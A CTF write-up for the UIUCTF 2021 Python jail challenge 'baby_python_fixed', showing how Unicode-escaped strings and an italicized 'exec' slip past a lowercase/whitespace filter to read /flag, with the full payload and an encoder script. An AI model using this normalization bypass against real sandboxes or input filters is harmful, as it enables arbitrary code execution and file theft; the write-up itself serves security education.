Rating: 3.0

# UIUCTF 2021 - baby_python_fixed Writeup
- Type - Jail
- Name - baby_python_fixed
- Points - 133

## Description
```
whoops, I made a typo on the other chal. it's probably impossible, right? Python
version is 3.8.10 and flag is at /flag

nc baby-python-fixed.chal.uiuc.tf 1337

author: tow_nater

[challenge.py]
```

## Writeup
The Python file included in the description was a very short but restrictive 4-line file:

```
import re
bad = bool(re.search(r'[a-z\s]', (input := input())))
exec(input) if not bad else print('Input contained bad characters')
exit(bad)
```

This script allows you to run any code that you want, the only characters you can't use are whitespace or lowercase characters. Since practically all of Python is in lowercase (and is case-sensitive), this obviously presented quite a challenge. After racking our brains and doing quite a bit of research, we had crossed off a couple of ideas like Python bytecode (you can't actually run it, I don't think) and a solution from a CTF in like 2013 where they ran code only using symbols (the key to it was deprecated in Python 3.x). One idea that we had stuck with us, but we couldn't quite finish it yet. We knew we could encode characters as hex values (`a` as `\x61`), but that still used a lowercase letter. After some investigation, I found we could use 8-digit Unicode characters (`a` as `\U00000061`).

I wrote a small Python script that takes input and converts it to Unicode so we could craft our payload:

```
input = input()

print("'", end="")
for letter in input:
print(hex(ord(letter)).replace("0x", "\\U000000").upper(), end="")

print("'")
```

Using this script, we crafted our payload `print(open("/flag","r").read())` as `'\U00000070\U00000072\U00000069\U0000006E\U00000074\U00000028\U0000006F\U00000070\U00000065\U0000006E\U00000028\U00000022\U0000002F\U00000066\U0000006C\U00000061\U00000067\U00000022\U0000002C\U00000022\U00000072\U00000022\U00000029\U0000002E\U00000072\U00000065\U00000061\U00000064\U00000028\U00000029\U00000029'`. All we needed was a way to run it! Python accepts strings and doesn't throw an error, but it doesn't run it. It wasn't until later that we realized we could use italic characters and have it execute our payload string. Using [an Italic generator](https://lingojam.com/ItalicTextGenerator), we generated `exec` italicized, and our final payload was `exec('\U00000070\U00000072\U00000069\U0000006E\U00000074\U00000028\U0000006F\U00000070\U00000065\U0000006E\U00000028\U00000022\U0000002F\U00000066\U0000006C\U00000061\U00000067\U00000022\U0000002C\U00000022\U00000072\U00000022\U00000029\U0000002E\U00000072\U00000065\U00000061\U00000064\U00000028\U00000029\U00000029')`. We inserted this payload into the netcat session and it was executed and worked!

![](https://raw.githubusercontent.com/BYU-CTF-group/writeups/main/UIUCTF_2021/babypythonfixed/gotFlag.png)

**Flag:** `uiuctf{unicode_normalization_is_not_normal_d2f674}`

## Real-World Application
This comes to show how difficult it is to filter invalid inputs. Understanding character encodings and how specific languages and applications handle them is very important when attempting to stop injection attacks. For example, to prevent someone from doing a SQL injection attack, you may block them from using a single quote `'`, but what about an italic single quote? While this may or may not work, my point still stands - you have to be very careful and thoughtful when creating filters.

Original writeup (https://github.com/BYU-CTF-group/writeups-uiuctf/tree/main/babypythonfixed).